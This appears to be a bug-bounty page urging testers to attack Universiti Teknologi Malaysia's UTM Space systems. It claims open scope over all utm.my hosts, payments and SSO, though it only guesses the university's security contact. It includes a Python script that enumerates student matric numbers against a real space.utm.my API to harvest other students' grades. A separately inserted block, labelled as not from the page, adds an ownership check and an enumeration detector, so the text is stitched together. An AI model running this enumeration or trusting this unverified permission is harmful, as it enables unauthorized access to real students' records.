Academic surface worth stress-testing
UTM Space serves as the central digital hub for Universiti Teknologi Malaysia, one of the country’s leading research-intensive universities serving tens of thousands of students and staff across multiple campuses in Johor and Kuala Lumpur. The platform concentrates sensitive student data, financial transactions, academic records, identity federation, course management, research grant administration, library access, and administrative workflows — fertile ground for unauthorized grade manipulation, mass PII exfiltration, payment diversion, and cross-department data bleed if tenant isolation fails. This playbook rewards only highest-impact, fully demonstrated criticals — each earns $5,000.
In scope materially: every HTTP host on utm.my operated by UTM, API endpoints, SSO integration (including SAML/OAuth flows), payment gateway connectors, database rows served by UTM infra, student and staff portal renderers, static deploy paths, session signing secrets in their custody, library system integrations, exam scheduling modules, hostel booking flows, research repository systems, mobile-responsive endpoints, IoT/smart-campus surfaces they expose, CDN cache poisoning surfaces where they originate HTML/JS bundles, and administrative dashboards.
Civil exclusions only: blackmail, mass student harassment, brute forcing wholly unrelated external bank accounts. Those bans are universal — not SKU-level scope fences.
1. Narrative kill chain tying root cause → exploit steps → observable impact
2. Proof the attack succeeds (replayable scripts, fixture logs, video with signatures, scripted harness).
Narratives without a working exploitation path are graded below payout threshold.
Why probe UTM Space?
Flat $5K critical payouts
No spreadsheet bingo — validated critical exploits with reproducible payloads earn exactly $5,000 USD.
Student data + payment blast radius
Transcripts, fees, enrollment, hostel bookings, library records, research grants — chained bugs often expose PII silently until someone maps them.
No fake micro-scope list
If UTM can patch/configure it — from portal JS to infra config — testers can escalate until severity lands or triage shuts with reasoning.
Responsible disclosure halo
Demonstrated exploits with airtight chains earn coordinated publication credit after fixes ship.
$5,000 per validated critical
There is exactly one bounty amount on this ledger: validated critical findings pay $5,000 USD each. Novel low-severity items may qualify for goodwill credit but not this stipend. Paid rows require attacker-readable kill chains and replayable exploitation artefacts (Burp exports, parallel request harnesses, SSO token forgeries, signing traces…).
Unauthorized access to or modification of student/staff records at scale; SSO bypass granting admin-level access across UTM’s portfolio; payment gateway manipulation causing silent fee reroute; mass PII exfiltration of academic or personal data; persisted RCE in portal or LMS control plane; break-glass access to signing keys or database credentials.
- Cross-user grade/transcript manipulation, enrollment logic desync, or duplicate credit
- Payment callback abuse causing silent fee reroute or duplicate credit at scale
- Break-glass SSRF egress from UTM infra to lateral cloud or on-premise systems
Illustrative map (non-exhaustive)
These rows do not impose limits — they’re shorthand for tagging reports. Anything UTM hosts, signs, proxies, parses, verifies, or integrates counts as bounty ground even if undocumented here. Treat “not listed” ≠ “out-of-scope”: default stance is open scope across UTM’s digital perimeter.
| Surface | Class | Critical payout |
|---|---|---|
| space.utm.my, portal HTML/JS/CSS, mobile endpoints, *.utm.my | Web · CDN | $5,000 / validated bug |
| Student APIs, LMS integrations (e.g. e-learning), SSO endpoints (SAML, OAuth, session cookies) | Backend | $5,000 / validated bug |
| Fee payment gateway, checkout redirects, receipt generation, financial aid systems | Payments | $5,000 / validated bug |
| Admin dashboards, exam scheduling, hostel booking, research repositories | Admin | $5,000 / validated bug |
| IoT / smart-campus surfaces, library systems, staff portals | Infra | $5,000 / validated bug |
Everything UTM operates — no exclusions list
Sandbox student portals, canary databases, Grafana for campus systems, Telegram/bot hooks for admin alerts, partner LMS or library integrations fronted by UTM — all eligible when critical impact reproduces.
- Vanity subdomains CNAME’d into UTM edge — show DNS/traffic proof in your write-up.
- Mobile app SDKs or widgets UTM ships to students/staff
- Research grant management systems operated under utm.my
- IoT or smart-campus callbacks verified with UTM-issued secrets
Rules of engagement
- Prove exploitation success. Provide scripts, HARs, parallel request captures, or signing traces showing data/state impact — not paper analysis alone.
- Number your hops. Session/API primitive → escalation → grade/payment/record integrity break.
- Minimize real-user blast radius. Prefer mirrors, low-value accounts, and reversible payloads when demonstrating theft-class bugs.
- Private coordination first. Use official intake on space.utm.my before public threads.
- Duplicate fairness. First qualifying PoC wins; followers close acknowledged-only.
How to submit a report
Use the security / vulnerability disclosure contact published on https://space.utm.my/ (security@utm.my is a common guess — verify on the live site before emailing). Template below.
# Title
[Critical][Exploit-Proven] <tight title>
# Executive summary — student/staff or financial impact in one paragraph
# Severity self-classification → must map to UTM Space critical definitions above
## Attack chain narrative (numbered, no gaps)
1. Preconditions (session, API key tier, endpoint, account ID)
2. Entry primitive — HTTP/WS line + signature headers
3. Pivot(s) → privilege/data/payment escalation
4. Final hop → PII exfil / grade manipulation / payment diversion / infra takeover equivalent
## Successful exploitation evidence
• Scripted replay showing record/payment impact
• Paired HAR/PCAP demonstrating cross-user data access
• Signing or token trace if SSO/crypto primitive involved
# Remediation suggestion (optional but appreciated)
• Short description of expected fix orientation
# Attachments (zipped, <10 MB, no malware)
- PoC script.py, capture.har, logs/
Python vignette · pair with reproducible HTTPS exploit replay
Pseudocode illustrating an IDOR transcript access — meaningless without attaching HAR/logs proving an unauthorized request retrieves another student’s academic record inside UTM Space.
```python
# BUGGY: verifies only session presence, skips transcript ownership bind
import requests

BASE = "https://space.utm.my/api/v1"
SESSION = "eyJhbGciOiJIUzI1NiIs..."  # valid student session


def fetch_transcript(student_id):
    # Any valid session cookie is accepted; the server never checks that the
    # requested student_id belongs to the session owner.
    resp = requests.get(
        f"{BASE}/transcripts/{student_id}",
        headers={"Cookie": f"utm_session={SESSION}"},
    )
    return resp.json()


# MISSING: server-side check that session.student_id == requested student_id
# attacker iterates student_id → exfiltrates arbitrary academic records
# (matric numbers are strings such as A23CS0001, so walk the numeric suffix)
for n in range(1, 5000):
    student_id = f"A23CS{n:04d}"
    data = fetch_transcript(student_id)
    if isinstance(data, dict) and "cgpa" in data:
        print(student_id, data["cgpa"])
```
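For contrast, the fix the vignette points at, as an added example that is neither the page's code nor anything from UTM: a handler that binds the requested transcript to the session owner before looking it up, and a small log-side detector for the ID-walking pattern. `Session`, `SESSIONS`, `TRANSCRIPTS`, `get_transcript` and `flag_id_walkers` are hypothetical names, and the sample data is constructed.

```python
# Added example (not from the UTM Space page or UTM's own code): the
# server-side ownership bind the vignette above says is missing, plus a
# detector for the ID-walking pattern. Names and sample rows are made up.
from collections import defaultdict
from dataclasses import dataclass

@dataclass(frozen=True)
class Session:
    student_id: str  # "" for staff sessions
    role: str        # "student" or "registrar"

SESSIONS = {  # constructed: session cookie -> identity
    "tok-alice": Session("A23CS0001", "student"),
    "tok-bob": Session("A23CS0002", "student"),
    "tok-reg": Session("", "registrar"),
}
TRANSCRIPTS = {  # constructed: student_id -> record
    "A23CS0001": {"cgpa": 3.71},
    "A23CS0002": {"cgpa": 2.95},
}

class Unauthenticated(Exception):
    pass

class Forbidden(Exception):
    pass

def get_transcript(session_cookie, student_id):
    """Return a transcript only if the session is bound to that student."""
    session = SESSIONS.get(session_cookie)
    if session is None:
        raise Unauthenticated("no valid session")
    # Object-level check before the lookup: a student session may only read
    # its own record, so a foreign ID is refused whether or not the row
    # exists, and record existence is not leaked via 403-vs-404.
    if session.role != "registrar" and session.student_id != student_id:
        raise Forbidden(f"session not bound to {student_id}")
    row = TRANSCRIPTS.get(student_id)
    if row is None:
        raise KeyError(student_id)  # 404 only for callers allowed to ask
    return row

def flag_id_walkers(access_log, limit=3):
    """Sessions that read more than `limit` distinct student IDs, given
    (session_cookie, requested_student_id) pairs as a gateway would log
    them; one account touching many records is a cheap enumeration signal."""
    seen = defaultdict(set)
    for cookie, sid in access_log:
        seen[cookie].add(sid)
    return {c for c, ids in seen.items() if len(ids) > limit}
```

The ordering matters: authorization runs before the record lookup, so a foreign ID returns the same refusal whether the record exists or not.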
Frequently asked questions
Is anything actually “out of scope” besides illegal stuff?
No discretionary product carve-outs — only universal legal/ethical lines (crime, harming unrelated civilians, ransomware, facilitating academic dishonesty, etc.). If UTM hosts, proxies, signs, or documents a surface technically, testers can escalate until triage disqualifies specifics.
Do speculative write-ups without a working exploit get paid?
No. $5K critical payouts require both a complete kill-chain narrative and evidence of a successful attack path (replayable artifacts). Theory-only stays in triage backlog without compensation.
Are staging / dev environments fair game?
Yes, whenever UTM labels or operates them. Demonstrate realism by mirroring configs/data where possible.
Duplicates?
Fastest validated chain + reproducible exploitation wins treasury; follower tickets close acknowledged only.
Lower severities rewarded?
Not under this $5K-flat critical playbook — escalate impact until it meets critical thresholds or accept non-monetary acknowledgement.
Critical chain + working exploit = $5,000
No narrow scope appendix — document the attack, prove it lands, file privately.